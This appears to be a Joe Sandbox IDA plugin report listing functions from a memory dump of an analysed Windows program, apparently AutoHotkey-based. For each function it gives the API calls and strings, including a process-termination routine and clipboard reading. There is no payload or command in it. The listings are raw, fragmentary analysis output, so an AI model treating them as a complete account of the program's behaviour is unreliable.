SetWindowTheme, xrefs: 00473B68
uxtheme, xrefs: 00473B52

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451410, Relevance: 7.7, APIs: 5, Instructions: 197com

APIs

CoInitialize.OLE32 ref: 00451428
CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,00000000), ref: 00451441
GetKeyboardLayout.USER32(00000000), ref: 004514F0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00451594
CoUninitialize.OLE32 ref: 004515E5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00461836, Relevance: 7.7, APIs: 5, Instructions: 160window

APIs

Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679

Part of subcall function 00459EE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00459EF8

Part of subcall function 00466520: SendMessageA.USER32(FFFF8001,00000465,00000000,FFFF8001), ref: 0046654E
Part of subcall function 00466520: SendMessageA.USER32(00007FFF,0000046F,?,00007FFF), ref: 00466569

Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0

Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C

Part of subcall function 00466790: SendMessageA.USER32(?,0000111E,00000000,00000000), ref: 004667AE
Part of subcall function 00466790: GetSysColor.USER32(00000005), ref: 004667C1
Part of subcall function 00466790: SendMessageA.USER32(?,0000111D,00000000,?), ref: 004667D2

Part of subcall function 004667E0: LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
Part of subcall function 004667E0: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
Part of subcall function 004667E0: FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
Part of subcall function 004667E0: SendMessageA.USER32(?,00000406,?,?), ref: 00466891
Part of subcall function 004667E0: SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7
Part of subcall function 004667E0: GetSysColor.USER32(0000000F), ref: 004668E2
Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8

__Stoull.NTSTC_LIBCMT ref: 004601BB

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 00460248
__Stoull.NTSTC_LIBCMT ref: 00460361
__Stoull.NTSTC_LIBCMT ref: 00460466
EnableWindow.USER32(?,00000000), ref: 0046049F
__Stoull.NTSTC_LIBCMT ref: 004604D1
ShowWindow.USER32(?,-00000001), ref: 0046050E
__Stoull.NTSTC_LIBCMT ref: 004605C5
__Stoull.NTSTC_LIBCMT ref: 004606BF
__Stoull.NTSTC_LIBCMT ref: 004606EC
__Stoull.NTSTC_LIBCMT ref: 004607E1
__Stoull.NTSTC_LIBCMT ref: 0046085F
__Stoull.NTSTC_LIBCMT ref: 00460887
__Stoull.NTSTC_LIBCMT ref: 004608D3
SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
__Stoull.NTSTC_LIBCMT ref: 00460BCE
SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
__Stoull.NTSTC_LIBCMT ref: 00460C4E
__Stoull.NTSTC_LIBCMT ref: 00460CBF
__Stoull.NTSTC_LIBCMT ref: 00460DC8
__Stoull.NTSTC_LIBCMT ref: 00460E06
__Stoull.NTSTC_LIBCMT ref: 00460E74
__Stoull.NTSTC_LIBCMT ref: 00460EA8
__Stoull.NTSTC_LIBCMT ref: 00460EDF
__Stoull.NTSTC_LIBCMT ref: 00460F85

Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87

__Stoull.NTSTC_LIBCMT ref: 0046106B
SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
__Stoull.NTSTC_LIBCMT ref: 004611E2
GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461878

Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461938
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461990
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004619E8
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461A37
GetWindowLongA.USER32(?,000000F0), ref: 00461D04
SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
GetWindowRect.USER32(?,?), ref: 0046205B
SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
SetLastError.KERNEL32(00000000), ref: 004620A8
SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
GetWindowLongA.USER32(?,000000EC), ref: 004620E8
SetLastError.KERNEL32(00000000), ref: 0046211B
SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
GetLastError.KERNEL32 ref: 00462131
GetWindowLongA.USER32(?,000000EC), ref: 00462140
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00461A62, Relevance: 7.7, APIs: 5, Instructions: 160window

APIs

Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
Part of subcall function 004714C0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0047141F,00000000,?), ref: 00471679

Part of subcall function 00459EE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00459EF8

Part of subcall function 00466520: SendMessageA.USER32(FFFF8001,00000465,00000000,FFFF8001), ref: 0046654E
Part of subcall function 00466520: SendMessageA.USER32(00007FFF,0000046F,?,00007FFF), ref: 00466569

Part of subcall function 00466600: SendMessageA.USER32(?,00000407,00000000,?), ref: 00466621
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00466631
Part of subcall function 00466600: SendMessageA.USER32(?,00000414,?,00000000), ref: 00466653
Part of subcall function 00466600: SendMessageA.USER32(00000000,00000417,00000000,00000000), ref: 00466667
Part of subcall function 00466600: SendMessageA.USER32(?,00000415,00000000,?), ref: 0046667B
Part of subcall function 00466600: SendMessageA.USER32(?,0000041B,00000001,00000000), ref: 0046668F
Part of subcall function 00466600: SendMessageA.USER32(?,0000041F,?,00000000), ref: 004666A4
Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000001), ref: 004666BA
Part of subcall function 00466600: SendMessageA.USER32(?,00000420,00000000,00000000), ref: 004666D0

Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C

Part of subcall function 00466790: SendMessageA.USER32(?,0000111E,00000000,00000000), ref: 004667AE
Part of subcall function 00466790: GetSysColor.USER32(00000005), ref: 004667C1
Part of subcall function 00466790: SendMessageA.USER32(?,0000111D,00000000,?), ref: 004667D2

Part of subcall function 004667E0: LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
Part of subcall function 004667E0: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
Part of subcall function 004667E0: FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
Part of subcall function 004667E0: SendMessageA.USER32(?,00000406,?,?), ref: 00466891
Part of subcall function 004667E0: SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7
Part of subcall function 004667E0: GetSysColor.USER32(0000000F), ref: 004668E2
Part of subcall function 004667E0: SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8

__Stoull.NTSTC_LIBCMT ref: 004601BB

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

__Stoull.NTSTC_LIBCMT ref: 00460248
__Stoull.NTSTC_LIBCMT ref: 00460361
__Stoull.NTSTC_LIBCMT ref: 00460466
EnableWindow.USER32(?,00000000), ref: 0046049F
__Stoull.NTSTC_LIBCMT ref: 004604D1
ShowWindow.USER32(?,-00000001), ref: 0046050E
__Stoull.NTSTC_LIBCMT ref: 004605C5
__Stoull.NTSTC_LIBCMT ref: 004606BF
__Stoull.NTSTC_LIBCMT ref: 004606EC
__Stoull.NTSTC_LIBCMT ref: 004607E1
__Stoull.NTSTC_LIBCMT ref: 0046085F
__Stoull.NTSTC_LIBCMT ref: 00460887
__Stoull.NTSTC_LIBCMT ref: 004608D3
SendMessageA.USER32(-000000F2,000000CF,00000000,00000000), ref: 00460995
__Stoull.NTSTC_LIBCMT ref: 00460BCE
SendMessageA.USER32(?,000000CC,?,00000000), ref: 00460C18
SendMessageA.USER32(?,000000CC,00000000,00000000), ref: 00460C3B
__Stoull.NTSTC_LIBCMT ref: 00460C4E
__Stoull.NTSTC_LIBCMT ref: 00460CBF
__Stoull.NTSTC_LIBCMT ref: 00460DC8
__Stoull.NTSTC_LIBCMT ref: 00460E06
__Stoull.NTSTC_LIBCMT ref: 00460E74
__Stoull.NTSTC_LIBCMT ref: 00460EA8
__Stoull.NTSTC_LIBCMT ref: 00460EDF
__Stoull.NTSTC_LIBCMT ref: 00460F85

Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87

__Stoull.NTSTC_LIBCMT ref: 0046106B
SendMessageA.USER32(?,-00001013,00000000,?), ref: 0046111F
__Stoull.NTSTC_LIBCMT ref: 004611E2
GetClassInfoExA.USER32(00400000,?,?), ref: 004611FE
GetWindowLongA.USER32(-000000E6,000000F0), ref: 004614EE
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461808
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461AA4

Part of subcall function 00466E80: GetWindowRect.USER32(?,?), ref: 00466E8D
Part of subcall function 00466E80: ScreenToClient.USER32(?,?), ref: 00466EA9
Part of subcall function 00466E80: GetClientRect.USER32(?,00000000), ref: 00466EB7
Part of subcall function 00466E80: GetWindowLongA.USER32(?,000000F0), ref: 00466EC2
Part of subcall function 00466E80: SetWindowLongA.USER32 ref: 00466EEE
Part of subcall function 00466E80: SendMessageA.USER32(?,00001328,00000000,00000000), ref: 00466F09
Part of subcall function 00466E80: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00466F18
Part of subcall function 00466E80: SendMessageA.USER32(00000000,0000132C,00000000,00000000), ref: 00466F2A

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461B64
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461BBC
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461C14
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 00461C63
GetWindowLongA.USER32(?,000000F0), ref: 00461D04
SendMessageA.USER32(00000001,00000401,00000001,00000000), ref: 00461E5B
GetWindowLongA.USER32(00000000,000000F0), ref: 00461E87
SendMessageA.USER32(?,000000F4,00000000), ref: 00461EAB
SendMessageA.USER32(?,00000401,?,00000000), ref: 00461ECE
SendMessageA.USER32(?,0000108E,?,00000000), ref: 00461F6A
SendMessageA.USER32(?,000000C5,00000000,00000000), ref: 00461FAC
SendMessageA.USER32(?,00000403,?,00000006), ref: 00461FF5
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00462034
GetWindowRect.USER32(?,?), ref: 0046205B
SendMessageA.USER32(?,000000F4,?,00000001), ref: 004620A4
SetLastError.KERNEL32(00000000), ref: 004620A8
SetWindowLongA.USER32(?,000000F0,?), ref: 004620B8
GetLastError.KERNEL32(?,000000F0,?), ref: 004620C2
GetWindowLongA.USER32(00000000,000000F0), ref: 004620D1
GetWindowLongA.USER32(?,000000EC), ref: 004620E8
SetLastError.KERNEL32(00000000), ref: 0046211B
SetWindowLongA.USER32(00000000,000000EC,?), ref: 00462127
GetLastError.KERNEL32 ref: 00462131
GetWindowLongA.USER32(?,000000EC), ref: 00462140
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00462169
SendMessageA.USER32(00000000,00001036,00000000,00000000), ref: 00462193
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 004621A1
SendMessageA.USER32(00000000,0000041D,00000000,00000000), ref: 0046222B
SendMessageA.USER32(06060606,00000192,?,?), ref: 004622BA
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 004622F5
InvalidateRect.USER32(?,00000000,00000001), ref: 0046231B

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045B8FD, Relevance: 7.6, APIs: 5, Instructions: 77window

APIs

SendMessageA.USER32(?,00000030,?,00000000), ref: 0045B91B
SendMessageA.USER32(?,00001024,00000000,?), ref: 0045B96B
SendMessageA.USER32(?,0000111E,00000000,?), ref: 0045B989
SendMessageA.USER32(?,00001006,00000001,?), ref: 0045B9A7
SendMessageA.USER32(00000000,0000100A,00000001,?), ref: 0045B9C5

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00452690, Relevance: 7.5, APIs: 5, Instructions: 34timewindowthread

APIs

SendMessageTimeoutA.USER32(00000000,00000010,00000000,00000000,00000002,000001F4,?), ref: 004526A7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004526B3
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 004526C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 004526D4
CloseHandle.KERNEL32(00000000), ref: 004526DB

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004207B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249

APIs

GetEnvironmentVariableA.KERNEL32(?,?,00000000,00000000,?,00000000,?,?), ref: 0042086F

Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D

Part of subcall function 00474A50: GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00474AA3

Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87

Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09

Strings

This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0042094D, 00420971
Not allowed as an output variable., xrefs: 00420A90
This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 00420931

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004197B0, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 229time

APIs

GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00494F3B), ref: 00419A4D

Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F

SetTimer.USER32(000601DA,00000009,0000000A,00000000), ref: 004198E7
KillTimer.USER32(000601DA,00000009), ref: 00419930

Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0

Strings

Out of memory., xrefs: 00419858

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00454940, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178

APIs

Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EF9E
Part of subcall function 0046EF40: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00445110,00000000,000000FF,00000000), ref: 0046EFD1

SysAllocString.OLEAUT32(0049E27C), ref: 00454A2E

Part of subcall function 00493552: FindMITargetTypeInstance.LIBCMT ref: 0049360D
Part of subcall function 00493552: FindVITargetTypeInstance.LIBCMT ref: 00493614
Part of subcall function 00493552: PMDtoOffset.LIBCMT ref: 00493626
Part of subcall function 00493552: std::bad_exception::bad_exception.LIBCMT ref: 00493650

SafeArrayCopy.OLEAUT32(00000000,00000000), ref: 00454AE0

Strings

gI, xrefs: 00454A7B
gI, xrefs: 00454A80

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004203B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 173

APIs

_strncpy.LIBCMT ref: 00420405

Part of subcall function 00485D47: RtlReAllocateHeap.NTDLL(00000000,00000000,0049555D,00000000), ref: 00485D86
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DC9
Part of subcall function 00485D47: GetLastError.KERNEL32(?,0048ACA3,00420EBC,0049555D,00000000,00000000,?,004852B4,00000000,00000010,?,?,0048533E,00420EBC,004A15D8,0000000C), ref: 00485DE1

Strings

Out of memory., xrefs: 0042049E
Function name too long., xrefs: 004203E4
Invalid method name., xrefs: 004204CC

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00451810, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146

APIs

GetLastError.KERNEL32 ref: 00451850

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

74791B72.VERSION(00000000,0049A9C0,?,?), ref: 004518D8

Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9

GetLastError.KERNEL32 ref: 0045195D

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Strings

%u.%u.%u.%u, xrefs: 004518FC

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0046F040, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120

APIs

WideCharToMultiByte.KERNEL32(00000000,00000400,?,00000000,E73DE900,00000000,00494FD8,00000000,00000000,00494FD8,?,?,00494FD8,004987E9,004987E9,00403969), ref: 0046F0E6

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

WideCharToMultiByte.KERNEL32(00000000,00000400,}TD,?,00000000,00000000,00494FD8,00000000,?,?,00494FD8,004987E9,004987E9,00403969,004987E9,?), ref: 0046F0AC

Strings

}TD, xrefs: 0046F042, 0046F0A4
?, xrefs: 0046F049

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00455BD0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99library

APIs

GetModuleHandleA.KERNEL32(atl), ref: 00455BE2
GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00455BF2

